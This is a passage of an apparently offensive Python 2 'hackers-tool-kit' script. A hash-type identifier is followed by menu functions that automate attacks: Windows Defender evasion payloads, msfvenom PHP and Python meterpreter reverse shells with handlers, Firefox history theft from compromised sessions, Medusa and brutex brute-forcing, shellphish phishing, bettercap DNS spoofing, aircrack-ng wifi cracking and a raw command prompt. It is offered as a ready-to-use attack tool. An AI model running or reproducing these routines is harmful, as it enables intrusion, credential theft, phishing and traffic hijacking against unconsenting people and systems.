hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#FOXHIS START# +#------------# +def foxhis(): + os.system('echo "sessions\n" >> foxhisses.rc') + os.system('echo "exit\n" >> foxhisses.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r foxhisses.rc') + os.system('rm -rf foxhisses.rc') + print "\n" + ses = raw_input("Session: ") + print "\nMaximum time (seconds) to wait for a response\n" + time = raw_input("Timeout: ") + os.system('echo "use firefox/gather/history\n" >> foxhis.rc') + os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) + os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) + os.system('echo "run\n" >> foxhis.rc') + os.system('msfconsole -q -r foxhis.rc') + os.system('rm -fr foxhis.rc') +#----------# +#FOXHIS END# + + +#RHAWK START# +#-----------# +def rhawk(): + os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") +#---------# +#RHAWK END# + + +#NANO START# +#----------# +def nano(): + print "opening nano in \033[93m/root/\033[0m folder" + os.system("sleep 2") + os.system("cd /root/ && nano") +#--------# +#NANO END# + + +#UPDATE HACKERS-TOOL-KIT START# +#-----------------------------# +def update(): + os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") +#---------------------------# +#UPDATE HACKERS-TOOL-KIT END# + +#COMPILE C START# +#---------------# +def compilec(): + print "filename / filepath" + r = raw_input("> ") + print "\nfilename2 / filepath2" + h = raw_input("> ") + + a = 'g++ {0} -o {1}'.format(r,h) + os.system(a) +#COMPILE C END# +#-------------# + +#DNS SPOOF START# +#---------------# +def dnsspoof(): + target = raw_input("\033[1mTarget:\033[0m ") + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dns.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dns.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.address {0}\n" >> dns.cap'.format(target)) + os.system('echo "dns.spoof on\n" >> dns.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dns.cap") + os.system("rm dns.cap") + +def dnsspoofall(): + domain1 = raw_input("\033[1mDomain1:\033[0m ") + domain2 = raw_input("\033[1mDomain2:\033[0m ") + os.system('echo "net.sniff on\n" >> dnsall.cap') + os.system('echo "set dns.spoof.domains {0},{1}\n" >> dnsall.cap'.format(domain1,domain2)) + os.system('echo "set dns.spoof.all true\n" >> dnsall.cap') + os.system('echo "dns.spoof on\n" >> dnsall.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet dnsall.cap") + os.system("rm dnsall.cap") + + +#-------------# +#DNS SPOOF END# + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + try: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit": + print "\nfollow @tuf_unkn0wn on instagram" + print "\nExiting..." + break + os.system("service tor stop") + os.system("service postgresql stop") + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + 